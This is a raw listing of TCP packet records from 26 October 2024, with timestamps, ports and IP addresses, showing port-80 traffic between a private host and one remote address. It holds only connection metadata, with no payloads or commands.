Oct 26, 2024 07:27:22.519049883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519052982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519061089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519064903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519081116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519084930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519098043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519108057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519126892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519145966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519177914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519221067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519256115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519269943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519284964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519300938 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519324064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519334078 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519339085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519355059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519367933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519382954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519399881 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519408941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519423008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519440889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.519449949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519469023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.519484997 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.560041904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560116053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560127974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560139894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560177088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.560178041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560198069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.560199976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560240984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.560305119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560317039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560328007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560348034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.560359955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.560389996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560400963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.560427904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.560441017 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.561012030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.561031103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.561043024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.561052084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.561079979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.561084032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.561094999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.561106920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.561120033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.561144114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.561157942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.574517965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574522018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574528933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574541092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574599981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.574626923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574640036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574641943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.574651957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574664116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.574670076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.574691057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.574717045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589556932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589618921 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589627028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589637041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589649916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589664936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589669943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589673042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589692116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589703083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589714050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589734077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589745998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589751005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589770079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589791059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589795113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589806080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589822054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589847088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589848042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589862108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589873075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589896917 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589900017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589910984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589922905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589935064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589940071 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589953899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589977980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.589987040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.589998007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590022087 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590045929 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590056896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590069056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590089083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590110064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590121031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590128899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590141058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590141058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590152979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590163946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590172052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590195894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590234041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590240002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590245962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590270996 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590296030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590320110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590332031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590342999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590358019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590383053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590414047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590418100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590418100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590426922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590452909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590466022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590483904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590496063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590512037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590512037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590523005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590536118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590543985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590552092 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590555906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590568066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590568066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590578079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590580940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590603113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590620041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590626955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590634108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590646029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590658903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590672970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590703011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590715885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590727091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590739965 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590758085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590766907 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590770960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590783119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590795040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590820074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590848923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590861082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590872049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590884924 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590909958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590913057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590923071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.590945005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.590970039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.595232964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595285892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.595333099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595350981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595364094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595371962 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.595376015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595391035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.595398903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595407963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.595412970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595426083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595437050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.595439911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595458031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.595464945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.595489979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634465933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634479046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634490013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634530067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634541035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634543896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634555101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634567022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634577990 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634579897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634592056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634601116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634604931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634619951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634624004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634635925 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634665012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634675026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634686947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634699106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634715080 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634722948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634738922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634763002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634764910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634778023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634795904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634814978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634819984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634839058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634851933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634862900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634871960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634874105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634871960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634885073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634905100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634917974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.634963036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634974003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634984016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.634995937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635000944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635011911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635015011 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635025024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635035992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635044098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635049105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635071993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635085106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635097027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635097980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635116100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635124922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635133982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635144949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635165930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635173082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635257006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635293007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635293961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635305882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635334015 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635351896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635359049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635371923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635384083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635395050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635402918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635406017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635433912 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635441065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635448933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635452986 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635464907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635474920 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635476112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635489941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635509014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635555029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635566950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635579109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635593891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635616064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635617971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635628939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635642052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635652065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635673046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635684967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635710001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635715961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635726929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635755062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635756016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635767937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635778904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635796070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635811090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635858059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635869026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635879040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635893106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635916948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635915995 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635930061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635936975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635945082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635971069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.635983944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.635994911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636014938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636019945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636034966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636051893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636068106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636080027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636090994 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636125088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636125088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636198044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636209965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636226892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636234045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636243105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636254072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636255026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636275053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636286020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636286020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636297941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636307955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636312008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636333942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636358023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636365891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636383057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636399984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636408091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636423111 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636429071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636439085 CEST	49982	80	192.168.2.7	185.215.113.84
